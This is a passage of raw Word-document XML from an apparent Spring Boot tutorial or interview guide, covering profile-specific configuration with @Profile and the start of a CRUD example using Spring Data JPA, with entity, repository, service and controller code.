    <w:p w14:paraId="05727D78"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sername=produser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144404E4"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password=prodpassword</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107C5D52"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Activate Profiles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E14D900"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activate a profile in multiple ways:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D5900B"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a. Through the Command Line (when running the application)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C03D4EF"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java -jar myapp.jar --spring.profiles.active=dev</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0C8D9F"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b. In application.properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA1DA76"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profiles.active=dev</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6246C891"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c. In application.yml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50894B80"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E224BC3"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ofiles:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C13EA6"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ctive: dev</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448D32BB"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Using @Profile Annotation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E01442"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Spring, you can use the @Profile annotation to specify that a particular bean should only be loaded for a specific profile.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A76307E"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532F502D"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context.annotation.Bean;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5923B898"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context.annotation.Configuration;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6D8EC9"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context.annotation.Profile;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680BA09D" w14:textId="77777777" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="00970969" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="211DA0F2"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ation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B42BB3"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AppConfig {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FD25F5" w14:textId="77777777" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="00970969" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44A5D6C2"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ean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292CB782"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ofile("dev")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3388B757"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DataSource devDataSource() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EEE5887"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DataSource("jdbc:mysql://localhost:3306/dev_db");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C6F74E"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440A3105" w14:textId="77777777" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="00970969" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="560763CF"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 xml:space="preserve">    @Bean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748CD19D"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ofile("prod")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595276EF"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DataSource prodDataSource() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA99540"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DataSource("jdbc:mysql://prod-db-server:3306/prod_db");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43CF9DB4"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0EE1D9FC"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097458FD"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this example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F869D7A"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devDataSource bean is created only if the active profile is dev.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A543AAB"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prodDataSource bean is created only if the active profile is prod.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5B9ACD"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4. Using @Profile with Component Scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314E5482"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also use @Profile with Spring components, such as @Component, @Service, or @Repository, to define profile-specific beans.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250CD53F"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785D9971"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stereotype.Service;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D46FCC"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context.annotation.Profile;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D1C6BE" w14:textId="77777777" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="00970969" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BC2347F"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ice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6464E54B"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rofile("dev")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBD6383"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DevDatabaseService implements DatabaseService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359F5655"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verride</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBFC821"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connect() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246D7E3F"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ystem.out.println("Connecting to the Dev Database");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1790EBB7"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2DAF8121"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0F9AAED" w14:textId="77777777" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="00970969" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="451F1B11"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ice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555E3444"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rofile("prod")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A07ED6C"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ProdDatabaseService implements DatabaseService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2BFE1C"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verride</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC042A6"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connect() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C9C945"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ystem.out.println("Connecting to the Production Database");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3B5CA5"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795DF417"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246A0181"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5. Accessing Profile-Specific Properties in Java Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C8821D"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inject values from profile-specific properties files into your beans using the @Value annotation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54345A9E"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77852F32"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beans.factory.annotation.Value;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B707C29"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stereotype.Service;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3558196C" w14:textId="77777777" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="00970969" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FD406A0"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ice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540ED90D"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DatabaseService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A9B903" w14:textId="77777777" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="00970969" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="022B9A82"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Value("${spring.datasource.url}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD32EB6"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String datasourceUrl;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B3F2E2" w14:textId="77777777" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="00970969" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57798EC2"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printDataSourceUrl() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D668D54"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ystem.out.println("DataSource URL: " + datasourceUrl);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1248BC17"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0B64797A"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2894FCDC"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f you activate the dev profile, the URL will be read from application-dev.properties.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B55EF5"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Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2708D172"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rofiles</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Spring Boot are a way to create environment-specific configurations and beans.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1857C062"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define properties for each environment in separate property files (e.g., application-dev.properties, application-prod.properties).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797C2B64"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activate profiles using the spring.profiles.active property and the @Profile annotation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B999995"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Profiles help in managing environment-specific configurations and ensure that the right configuration is used for the right environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222C73DB" w14:textId="4CC334B2"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44A9857">
          <v:rect id="_x0000_i2614" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D39AF5D" w14:textId="315094C4" w:rsidR="007D2E6B" w:rsidRPr="00CE4B95" w:rsidRDefault="00864748">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="620" w:name="_Toc196308100"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How will you do CRUD operations using spring boot applications</w:t>
      </w:r>
      <w:r w:rsidR="007D2E6B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="620"/>
    </w:p>
    <w:p w14:paraId="78B03F71" w14:textId="60076F05" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="002C6305"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hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00970969" w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>o perform CRUD operations in a Spring Boot application, you'll typically follow these steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7ED58D"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Set Up a Spring Boot Project</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D353AB"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tart by setting up a Spring Boot project. You can either use Spring Initializr (</w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidRPr="002C6305">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
            <w:color w:val="auto"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>https://start.spring.io/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>) or set up the project manually.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3DB1F7"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ependencies you might need</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE151AE"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 Web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12077148"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 Data JPA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42918E4E"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H2 Database (or any other database like MySQL, PostgreSQL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650D142F"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 Boot DevTools (optional for easier development)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CC44B6"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Configure Database Connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5474DAB3"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application.properties (or application.yml), set up the database connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F6E40A"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 for H2 (in-memory database):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17971366"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rl=jdbc:h2:mem:testdb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CFF9A3"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driverClassName=org.h2.Driver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA8A3ED"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sername=sa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A5A067"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password=password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77075912"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jpa.database-platform=org.hibernate.dialect.H2Dialect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF0F695"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h2.console.enabled=true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A309377"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jpa.hibernate.ddl-auto=update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0495EDE9"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 for MySQL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D4C789"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rl=jdbc:mysql://localhost:3306/mydb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF7759D"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sername=root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F67CD45"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password=password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3AA39C"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jpa.hibernate.ddl-auto=update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A385D1"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jpa.database-platform=org.hibernate.dialect.MySQL8Dialect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C517D37"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Create the Entity Class (Model)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3D7C19"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reate an entity class to map to your database table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACEB21C"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 of a User entity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7693ACA4"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javax.persistence.Entity;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5312EE"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javax.persistence.Id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0009F7FA" w14:textId="77777777" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="00970969" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="197AD830"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tity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C45CEB"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User {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402D5C56" w14:textId="77777777" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="00970969" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="273C2308"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Id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4918BEBA"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Long id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5559B0B9"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String name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDD8A29"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String email;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0A48C0" w14:textId="77777777" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="00970969" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="479598FC"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Constructors, getters and setters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511ACDF8"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0C5C7572"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4. Create the Repository Interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52123B6E"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e Spring Data JPA to handle database operations. The repository will handle all the CRUD operations for you.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207EBA76"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38C40FFE"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data.jpa.repository.JpaRepository;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A655EB" w14:textId="77777777" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="00970969" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C3AFFA0"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interface UserRepository extends JpaRepository&lt;User, Long&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6D5C24"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You can define custom queries if needed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5474A1B3"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196C3AF4"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JpaRepository provides built-in methods like save(), findById(), findAll(), deleteById(), etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681E5DD5"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5. Create the Service Class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7002A13F"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A service layer is where you put the business logic, interacting with the repository to perform CRUD operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF0EB2B"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487A9F12"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beans.factory.annotation.Autowired;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23355633"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stereotype.Service;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5038A224" w14:textId="77777777" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="00970969" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27B12116"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java.util.List;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514F12F2"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java.util.Optional;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6196B277" w14:textId="77777777" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="00970969" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D49764A"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ice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="364BE6C6"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UserService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E1175E" w14:textId="77777777" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="00970969" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E4A3809"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50545E4D"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UserRepository userRepository;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB2902E" w14:textId="77777777" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="00970969" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1052173F"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Create or Update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385279E5"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User saveUser(User user) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1B0DE6"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userRepository.save(user);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF103E0"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482E819D" w14:textId="77777777" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="00970969" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B2F4AB0"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Get all users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205115EF"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List&lt;User&gt; getAllUsers() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C33D0D"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userRepository.findAll();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0A03A7"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0D3ACEAD" w14:textId="77777777" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="00970969" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24176E62"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Get a user by id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F26D89"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Optional&lt;User&gt; getUserById(Long id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C60E2A2"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userRepository.findById(id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE32DBA"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055E205A" w14:textId="77777777" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="00970969" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="070BBFD7"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Delete user by id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CB55D9"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deleteUser(Long id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA94F41"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userRepository.deleteById(id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09526043"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843902E"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12FF0423"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6. Create the Controller Class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4E7ADF"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controller handles HTTP requests and interacts with the service layer to perform CRUD operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CC93C7"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 of a UserController:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484E202B"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beans.factory.annotation.Autowired;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7834FA85"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web.bind.annotation.*;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237BA58C" w14:textId="77777777" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="00970969" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="598AAE9F"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java.util.List;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3859DD88"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java.util.Optional;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A948717" w14:textId="77777777" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="00970969" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F0F71A5"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tController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E879D2E"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questMapping("/api/users")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A5F089"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UserController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7009974D" w14:textId="77777777" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="00970969" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AFE5584"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4A237C33"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UserService userService;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6082CC" w14:textId="77777777" w:rsidR="00970969" w:rsidRPr="002C6305" w:rsidRDefault="00970969" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6786B6E1"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Create or Update a User</w:t>
      </w:r>
    </w:p>
